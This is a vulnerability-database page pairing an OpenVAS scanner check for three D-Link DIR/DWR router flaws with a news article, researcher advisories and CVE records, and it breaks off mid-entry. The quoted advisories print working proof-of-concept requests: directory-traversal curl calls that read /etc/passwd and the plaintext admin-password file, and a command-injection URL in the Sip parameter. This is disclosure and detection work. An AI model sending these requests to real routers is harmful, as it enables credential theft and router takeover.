ID OPENVAS:1361412562310108487 Type openvas Reporter Copyright (C) 2018 Greenbone Networks GmbH Modified 2020-05-08T00:00:00
Description
The host is a D-Link (DIR/DWR) device which is
prone to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
#
# D-Link DIR/DWR Devices Multiple Vulnerabilities - Oct18
#
# Authors:
# Christian Fischer <christian.fischer@greenbone.net>
#
# Copyright:
# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
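# Vendor-level CPE prefix (no model, no version): the detection scripts listed in
# script_dependencies() register per-model CPEs, and the prefix lookup further down
# deliberately matches every D-Link device they found, because devices beyond the
# officially listed models have turned out to share the affected firmware.
CPE_PREFIX = "cpe:/o:d-link";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.108487");
  script_version("2020-05-08T08:34:44+0000");
  script_cve_id("CVE-2018-10822", "CVE-2018-10823", "CVE-2018-10824");
  # CVSS base/vector are those of the highest-rated of the three issues,
  # the authenticated command injection CVE-2018-10823 (Au:S => authentication required).
  script_tag(name:"cvss_base", value:"9.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:S/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
  script_tag(name:"creation_date", value:"2018-11-26 13:53:11 +0100 (Mon, 26 Nov 2018)");

  script_name("D-Link DIR/DWR Devices Multiple Vulnerabilities - Oct18");

  # ACT_ATTACK: this is an active check that sends a request to the target (see the
  # "vuldetect" tag below), not a pure version comparison.
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2018 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("gb_dlink_dsl_detect.nasl", "gb_dlink_dap_detect.nasl", "gb_dlink_dir_detect.nasl", "gb_dlink_dwr_detect.nasl");
  script_mandatory_keys("Host/is_dlink_device"); # nb: Experiences in the past have shown that various different devices might be affected
  script_require_ports("Services/www", 80);

  script_xref(name:"URL", value:"https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10093");
  script_xref(name:"URL", value:"http://sploit.tech/2018/10/12/D-Link.html");
  script_xref(name:"URL", value:"https://seclists.org/fulldisclosure/2018/Oct/36");

  script_tag(name:"summary", value:"The host is a D-Link (DIR/DWR) device which is
prone to multiple vulnerabilities.");

  # Only the unauthenticated directory traversal (CVE-2018-10822) is verified on the
  # wire; the other two CVEs are reported along with it because they share the
  # affected firmware and are chained from it in the advisory.
  script_tag(name:"vuldetect", value:"Send a crafted HTTP GET request
and check whether it is possible to read a file on the filesystem.");

  script_tag(name:"insight", value:"Multiple flaws exist due to:
- a directory traversal vulnerability in the web interface (CVE-2018-10822) caused by an incorrect
fix for CVE-2017-6190.
- the administrative password stored in plaintext in the /tmp/XXX/0 file (CVE-2018-10824).
- the possibility to inject shell commands as an authenticated user into the Sip parameter
of the chkisg.htm page (CVE-2018-10823).");

  script_tag(name:"impact", value:"Successful exploitation will allow a remote
attacker to read arbitrary files on the target system, extract plain text
passwords or execute remote commands.");

  script_tag(name:"affected", value:"DWR-116 through 1.06,
DIR-140L and DIR-640L through 1.02,
DWR-512, DWR-712, DWR-912 and DWR-921 through 2.02,
DWR-111 through 1.01.
Other devices, models or versions might be also affected.");

  script_tag(name:"solution", value:"See the vendor advisory for a solution.");

  # "remote_vul": the finding is backed by an actual response from the target rather
  # than a banner/version match, hence the high quality of detection.
  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}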
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("misc_func.inc");
# Resolve the HTTP port and the concrete CPE registered for this host by one of the
# D-Link detection scripts; without a matching detection there is nothing to test.
if( ! infos = get_app_port_from_cpe_prefix( cpe:CPE_PREFIX, service:"www" ) )
  exit( 0 );

port = infos["port"];
CPE  = infos["cpe"];

# Install location of the web interface as recorded by the detection script.
if( ! dir = get_app_location( cpe:CPE, port:port ) )
  exit( 0 );

# A root install would otherwise yield a "//uir//..." request path.
if( dir == "/" )
  dir = "";

# traversal_files() maps a regex that identifies a file's content to the relative
# path of a well-known, world-readable file on the given platform.
files = traversal_files( "linux" );

foreach regex( keys( files ) ) {

  target_url = dir + "/uir//" + files[regex];

  # The hit counts only if the body matches the file's regex and (check_header:TRUE)
  # the response headers pass the helper's additional status check, which keeps
  # generic error pages or redirects from being reported as a successful read.
  if( ! http_vuln_check( port:port, url:target_url, pattern:regex, check_header:TRUE ) )
    continue;

  security_message( port:port, data:http_report_vuln_url( port:port, url:target_url ) );
  exit( 0 );
}

# 99 is the Greenbone convention for "test completed, target not vulnerable".
exit( 99 );
{"id": "OPENVAS:1361412562310108487", "type": "openvas", "bulletinFamily": "scanner", "title": "D-Link DIR/DWR Devices Multiple Vulnerabilities - Oct18", "description": "The host is a D-Link (DIR/DWR) device which is\n prone to multiple vulnerabilities.", "published": "2018-11-26T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108487", "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "references": ["https://seclists.org/fulldisclosure/2018/Oct/36", "http://sploit.tech/2018/10/12/D-Link.html", "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10093"], "cvelist": ["CVE-2018-10823", "CVE-2018-10824", "CVE-2017-6190", "CVE-2018-10822"], "lastseen": "2020-05-12T16:30:43", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:9C79643921703C4490513BB2D496FCA3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142052", "PACKETSTORM:149844"]}, {"type": "cve", "idList": ["CVE-2018-10822", "CVE-2018-10823", "CVE-2018-10824", "CVE-2017-6190"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:487819B5F7D2057B581292BB94033613", "EXPLOITPACK:99C55C552E76F7F5F22B613B84A71628", "EXPLOITPACK:74666E227460F5E33300C7E86CA29F21", "EXPLOITPACK:8AB3A02A28DDB5D882D234C411704FB7"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108486"]}, {"type": "exploitdb", "idList": ["EDB-ID:41840", "EDB-ID:45677", "EDB-ID:45678", "EDB-ID:45676"]}, {"type": "zdt", "idList": ["1337DAY-ID-31400", "1337DAY-ID-31401", "1337DAY-ID-31402"]}], "modified": "2020-05-12T16:30:43", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2020-05-12T16:30:43", "rev": 2}, "vulnersScore": 7.2}, "pluginID": "1361412562310108487", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# D-Link DIR/DWR Devices 
Multiple Vulnerabilities - Oct18\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE_PREFIX = \"cpe:/o:d-link\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108487\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2018-10822\", \"CVE-2018-10823\", \"CVE-2018-10824\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-26 13:53:11 +0100 (Mon, 26 Nov 2018)\");\n\n script_name(\"D-Link DIR/DWR Devices Multiple Vulnerabilities - Oct18\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dlink_dsl_detect.nasl\", \"gb_dlink_dap_detect.nasl\", \"gb_dlink_dir_detect.nasl\", \"gb_dlink_dwr_detect.nasl\");\n script_mandatory_keys(\"Host/is_dlink_device\"); # nb: Experiences in the past have shown that various different devices might be 
affected\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10093\");\n script_xref(name:\"URL\", value:\"http://sploit.tech/2018/10/12/D-Link.html\");\n script_xref(name:\"URL\", value:\"https://seclists.org/fulldisclosure/2018/Oct/36\");\n\n script_tag(name:\"summary\", value:\"The host is a D-Link (DIR/DWR) device which is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request\n and check whether it is possible to read a file on the filesystem.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - a directory traversal vulnerability in the web interface (CVE-2018-10822) caused by an incorrect\n fix for CVE-2017-6190.\n\n - the administrative password stored in plaintext in the /tmp/XXX/0 file (CVE-2018-10824).\n\n - the possibility to injection code shell commands as an authenticated user into the Sip parameter\n of the chkisg.htm page (CVE-2018-10823).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files on the target system, extract plain text\n passwords or execute remote commands.\");\n\n script_tag(name:\"affected\", value:\"DWR-116 through 1.06,\n\n DIR-140L and DIR-640L through 1.02,\n\n DWR-512, DWR-712, DWR-912 and DWR-921 through 2.02,\n\n DWR-111 through 1.01.\n\n Other devices, models or versions might be also affected.\");\n\n script_tag(name:\"solution\", value:\"See the vendor advisory for a solution.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! 
infos = get_app_port_from_cpe_prefix( cpe:CPE_PREFIX, service:\"www\" ) )\n exit( 0 );\n\nport = infos[\"port\"];\nCPE = infos[\"cpe\"];\n\nfiles = traversal_files( \"linux\" );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n url = dir + \"/uir//\" + file;\n\n if( http_vuln_check( port:port, url:url, pattern:pattern, check_header:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses", "immutableFields": []}
{"threatpost": [{"lastseen": "2019-10-12T19:32:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-6190", "CVE-2018-10822", "CVE-2018-10823", "CVE-2018-10824"], "description": "Eight D-Link routers in the company\u2019s small/home office \u201cDWR\u201d range are vulnerable to complete takeover \u2013 but the vendor said it is planning on only patching two, according to a researcher.\n\nB\u0142a\u017cej Adamczyk of the Silesian University of Technology in Poland discovered the vulnerabilities in May, uncovering that they affect the DWR-111, DWR-116, DWR-140, DWR-512, DWR-640, DWR-712, DWR-912 and DWR-921 models. However, he claims that D-Link told him that only the DWR-116 and 111 would be patched, because the rest have reached end-of-life and will no longer be supported.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/10/17112931/D-Link-DWR-1111.jpg>)\n\nHowever, D-Link hasn\u2019t issued the two promised patches, so after warning the vendor in September that he would publicly disclose the flaws if they weren\u2019t addressed within a month, Adamczyk has published his findings, along with a [proof-of-concept video](<https://www.youtube.com/watch?v=s2xrQlfd7BY&feature=youtu.be>).\n\nA full compromise including remote command-injection can be achieved by linking three cascading vulnerabilities together to attack the router\u2019s web-based settings panel. This can be done from a local network device or from the internet, depending on the configuration of the network. Most small/home office (SOHO) users have a fairly simple set-up, with the routers connecting directly to an internet connection to feed bandwidth to multiple WiFi devices inside the home or office. That presents a pretty straightforward attack surface for an attacker.\n\nFirst, a directory-traversal bug (CVE-2018-10822) exists in the web interface for the D-Link routers, which allows remote attackers to read arbitrary files via a /.. 
or // after a \u201cGET /uir\u201d in an HTTP request. This allows the bad guys to move laterally and read files in other directories, including password files.\n\nThat\u2019s where a second vulnerability (CVE-2018-10824) comes in: Passwords are stored in plaintext, including the administrative password, which can be found in a temporary file.\n\nIn a proof-of-concept, a basic command returns a binary configuration file which contains administrative username and password in cleartext as well as many other router configuration settings. Thus, by using the directory traversal vulnerability, it is possible to read the file without authentication.\n\n\u201cThe attack is too simple,\u201d Adamczyk said in a recent [posting](<https://seclists.org/fulldisclosure/2018/Oct/36>). \u201cAn attacker having a directory traversal (or local file inclusion) can easily get full router access.\u201d\n\nA third vulnerability (CVE-2018-10823) meanwhile is what opens the door for remote code-injection. This is a shell command-injection bug in the httpd server for several series of D-Link routers.\n\n\u201cAn authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter,\u201d Adamczyk explained. \u201cThis allows for full control over the device internals.\u201d\n\nTo exploit this, an adversary would log into the router using the credentials he or she lifted using the first two vulnerabilities, request a certain URL as laid out in the researcher\u2019s PoC, and then be able to see the passwd file contents in the response.\n\n\u201cTaking all the three together it is easy to gain full router control, including arbitrary code-execution,\u201d Adamczyk said.\n\nAdding insult to injury, the researcher explained that the first vulnerability was actually introduced in a flawed patch for an older vulnerability, CVE-2017-6190. 
The older flaw also contained the plaintext password issue, CVE-2018-10824 \u2013 but it wasn\u2019t addressed for all releases, according to Adamczyk.\n\nD-Link did not immediately respond to Threatpost\u2019s request for comment, but we\u2019ll update the story if it does.\n\nThe vendor is no stranger to remote code-execution flaws; earlier in October [it patched](<https://threatpost.com/d-link-patches-rce-bugs-in-wireless-access-point-gear/137960/>) four vulnerabilities in the software controller tool used in its enterprise-class wireless network access points that would allow RCE. And, last year [it was uncovered](<https://threatpost.com/popular-d-link-router-riddled-with-vulnerabilities/127907/>) that its D-Link router model 850L wireless AC1200 dual-band gigabit cloud router was riddled with vulnerabilities that could allow a hacker to gain remote access and control of device.\n\nEarlier this month a report came out showing that a staggering 83 percent of home and office routers have vulnerabilities that could be exploited by attackers. Of those vulnerable, over a quarter harbor high-risk and critical vulnerabilities, according to the [American Consumer Institute on router safety.](<http://www.theamericanconsumer.org/wp-content/uploads/2018/09/FINAL-Wi-Fi-Router-Vulnerabilities.pdf>)\n\nThe potential ramifications aren\u2019t just about putting SOHO users themselves at risk, given that in many cases remote users rely on these routers to connect to corporate networks.\n\n\u201cWhile protecting the network will always be a challenge, it becomes even more so with remote employees joining the organization\u2019s ranks,\u201d said Justin Jett, director of audit and compliance for Plixer, via email. \u201cBecause these employees will be connecting to the office from their home router, IT professionals should monitor every conversation coming from these remote employees into the business. 
Three-quarters of the workforce [works remotely or on a mobile basis, and that] is a large surface area for malware to enter the organization, especially with 83 percent of home routers already giving access to hackers.\u201d\n", "modified": "2018-10-17T15:24:27", "published": "2018-10-17T15:24:27", "id": "THREATPOST:9C79643921703C4490513BB2D496FCA3", "href": "https://threatpost.com/multiple-d-link-routers-open-to-complete-takeover-with-simple-attack/138383/", "type": "threatpost", "title": "Multiple D-Link Routers Open to Complete Takeover with Simple Attack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-10-18T10:13:12", "description": "", "published": "2018-10-18T00:00:00", "type": "packetstorm", "title": "D-Link Plain-Text Password Storage / Code Execution / Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10823", "CVE-2018-10824", "CVE-2017-6190", "CVE-2018-10822"], "modified": "2018-10-18T00:00:00", "id": "PACKETSTORM:149844", "href": "https://packetstormsecurity.com/files/149844/D-Link-Plain-Text-Password-Storage-Code-Execution-Directory-Traversal.html", "sourceData": "` aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \nMULTIPLE VULNERABILITIES IN D-LINK ROUTERS \n \n \nBlazej Adamczyk (br0x) \nblazej.adamczyk@gmail.com \nhttp://sploit.tech/ \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n \n \n12.10.2018 \n \n \n1 Directory Traversal in httpd server in several series of D-Link \nrouters \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \naa \n \nCVE: CVE-2018-10822 \n \nCVSS v3: 8.6 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N) \n \nDirectory traversal vulnerability in the web interface on D-Link \nrouters: \naC/ DWR-116 through 1.06, \naC/ DIR-140L through 1.02, \naC/ DIR-640L through 1.02, \naC/ DWR-512 through 2.02, \naC/ DWR-712 through 2.02, \naC/ DWR-912 through 2.02, \naC/ DWR-921 through 2.02, \naC/ DWR-111 through 1.01, \naC/ and probably others with the 
same type of firmware \n \nallows remote attackers to read arbitrary files via a /.. or // after \n\"GET /uir\" in an HTTP request. \n \nNOTE: this vulnerability exists because of an incorrect fix for \nCVE-2017-6190. \n \nPoC: \naaaaa \na $ curl http://routerip/uir//etc/passwd \naaaaa \n \nThe vulnerability can be used retrieve administrative password using \nthe other disclosed vulnerability - CVE-2018-10824 \n \nThis vulnerability was reported previously by Patryk Bogdan in \nCVE-2017-6190 but he reported it is fixed in certain release but \nunfortunately it is still present in even newer releases. The \nvulnerability is also present in other D-Link routers and can be \nexploited not only (as the original author stated) by double dot but \nalso absolutely using double slash. \n \n \n2 Password stored in plaintext in several series of D-Link routers \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n \nCVE: CVE-2018-10824 \n \nAn issue was discovered on D-Link routers: \naC/ DWR-116 through 1.06, \naC/ DIR-140L through 1.02, \naC/ DIR-640L through 1.02, \naC/ DWR-512 through 2.02, \naC/ DWR-712 through 2.02, \naC/ DWR-912 through 2.02, \naC/ DWR-921 through 2.02, \naC/ DWR-111 through 1.01, \naC/ and probably others with the same type of firmware. \n \nNOTE: I have changed the filename in description to XXX because the \nvendor leaves some EOL routers unpatched and the attack is too \nsimple. \n \nThe administrative password is stored in plaintext in the /tmp/XXX/0 \nfile. An attacker having a directory traversal (or LFI) can easily \nget \nfull router access. \n \nPoC using the directory traversal vulnerability disclosed at the same \ntime - CVE-2018-10822 \n \naaaaa \na $ curl http://routerip/uir//tmp/XXX/0 \naaaaa \n \nThis command returns a binary config file which contains admin \nusername and password as well as many other router configuration \nsettings. 
By using the directory traversal vulnerability it is \npossible to read the file without authentication. \n \n \n3 Shell command injection in httpd server of a several series of D-Link \nrouters \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \naaaaaaaa \n \nCVE: CVE-2018-10823 \n \nCVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) \n \nAn issue was discovered on D-Link routers: \naC/ DWR-116 through 1.06, \naC/ DWR-512 through 2.02, \naC/ DWR-712 through 2.02, \naC/ DWR-912 through 2.02, \naC/ DWR-921 through 2.02, \naC/ DWR-111 through 1.01, \naC/ and probably others with the same type of firmware. \n \nAn authenticated attacker may execute arbitrary code by injecting the \nshell command into the chkisg.htm page Sip parameter. This allows for \nfull control over the device internals. \n \nPoC: \n1. Login to the router. \n2. Request the following URL after login: \naaaaa \na $ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20 \n%2Fetc%2Fpasswd \naaaaa \n3. See the passwd file contents in the response. \n \n \n4 Exploiting all together \naaaaaaaaaaaaaaaaaaaaaaaaa \n \nCVSS v3: 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \nTaking all the three together it is easy to gain full router control \nincluding arbitrary code execution. 
\n \nDescription with video: [http://sploit.tech/2018/10/12/D-Link.html] \n \n \n5 Timeline \naaaaaaaaaa \n \naC/ 09.05.2018 - vendor notified \naC/ 06.06.2018 - asked vendor about the status because of long vendor \nresponse \naC/ 22.06.2018 - received a reply that a patch will be released for \nDWR-116 and DWR-111, for the other devices which are EOL an \nannouncement will be released \naC/ 09.09.2018 - still no reply from vendor about the patches or \nannouncement, I have warned the vendor that if I will not get a \nreply in a month I will publish the disclosure \naC/ 12.10.2018 - disclosing the vulnerabilities \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149844/dlink-traversalexec.txt"}, {"lastseen": "2017-04-10T19:24:19", "description": "", "published": "2017-04-07T00:00:00", "type": "packetstorm", "title": "D-Link DWR-116 Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6190"], "modified": "2017-04-07T00:00:00", "id": "PACKETSTORM:142052", "href": "https://packetstormsecurity.com/files/142052/D-Link-DWR-116-Directory-Traversal.html", "sourceData": "`# Title: D-Link DWR-116 Arbitrary File Download \n# Vendor: D-Link (www.dlink.com) \n# Affected model(s): DWR-116 / DWR-116A1 \n# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU) \n# CVE: CVE-2017-6190 \n# Date: 04.07.2016 \n# Author: Patryk Bogdan (@patryk_bogdan) \n \nDescription: \nD-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability \nwhich leads to unathorized file download from device filesystem. 
\n \n \nPoC: \n \nHTTP Request: \nGET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 \nHost: 192.168.2.1 \nAccept: */* \nAccept-Language: en \nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) \nConnection: close \n \nHTTP Response: \nHTTP/1.0 200 OK \nContent-Type: application/x-none \nCache-Control: max-age=60 \nConnection: close \n \nroot:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash \nnobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin \nftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin \n \n \nFix: \nUpdate device to the new firmware (V1.05b09) \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142052/dlinkdwr116-traversal.txt"}], "cve": [{"lastseen": "2021-02-02T06:52:24", "description": "An issue was discovered on D-Link DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. The administrative password is stored in plaintext in the /tmp/csman/0 file. 
An attacker having a directory traversal (or LFI) can easily get full router access.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-17T14:29:00", "title": "CVE-2018-10824", "type": "cve", "cwe": ["CWE-22", "CWE-522"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10824"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:d-link:dwr-921_firmware:2.02", "cpe:/o:d-link:dwr-512_firmware:2.02", "cpe:/o:d-link:dwr-111_firmware:1.01", "cpe:/o:d-link:dir-140l_firmware:1.02", "cpe:/o:d-link:dwr-912_firmware:2.02", "cpe:/o:d-link:dwr-116_firmware:1.06", "cpe:/o:d-link:dir-640l_firmware:1.02", "cpe:/o:d-link:dwr-712_firmware:2.02"], "id": "CVE-2018-10824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10824", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:d-link:dir-640l_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-912_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-111_firmware:1.01:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-921_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-512_firmware:2.02:*:*:*:*:*:*:*", 
"cpe:2.3:o:d-link:dwr-712_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-116_firmware:1.06:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-140l_firmware:1.02:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:24", "description": "Directory traversal vulnerability in the web interface on D-Link DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request. NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-10-17T14:29:00", "title": "CVE-2018-10822", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10822"], "modified": "2019-01-23T14:10:00", "cpe": ["cpe:/o:d-link:dwr-921_firmware:2.02", "cpe:/o:d-link:dwr-512_firmware:2.02", "cpe:/o:d-link:dwr-111_firmware:1.01", "cpe:/o:d-link:dir-140l_firmware:1.02", "cpe:/o:d-link:dwr-912_firmware:2.02", 
"cpe:/o:d-link:dwr-116_firmware:1.06", "cpe:/o:d-link:dir-640l_firmware:1.02", "cpe:/o:d-link:dwr-712_firmware:2.02"], "id": "CVE-2018-10822", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10822", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:d-link:dir-640l_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-912_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-111_firmware:1.01:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-921_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-512_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-712_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-116_firmware:1.06:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-140l_firmware:1.02:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:24", "description": "An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. 
